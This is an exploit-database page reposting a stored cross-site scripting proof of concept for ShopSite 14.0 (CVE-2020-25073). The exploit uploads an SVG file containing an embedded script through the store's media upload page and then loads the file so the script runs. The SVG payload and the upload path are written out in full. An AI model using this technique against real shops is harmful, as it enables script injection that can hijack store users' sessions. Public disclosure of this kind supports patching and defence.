Advertisement






ShopSite 14.0 Cross Site Scripting

CVE Category Price Severity
CVE-2020-25073 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2023-12-26
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023120047

Below is a copy:

ShopSite 14.0 Cross Site Scripting
# Exploit Title: ShopSite Version: 14.0 - Stored XSS
# Date: 2023-12-25
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://www.shopsite.com/
# Version: 14.0
# Tested on: https://www.shopsite.com/demo.html



1 ) Upload poc.svg file here : https://demo.shopsite.com/cgi-bin/ssdemos/stores/alsdemo/ss/mediam.cgi

poc.svg

<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 500 500">
    <script>//<![CDATA[
        alert(document.domain)
    //]]>
    </script>
</svg>


2 ) Check here will be see alert button : https://a-demo-store.com/ssdemos/stores/alsdemo3/media/ss_sunglasses/aaa.svg

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.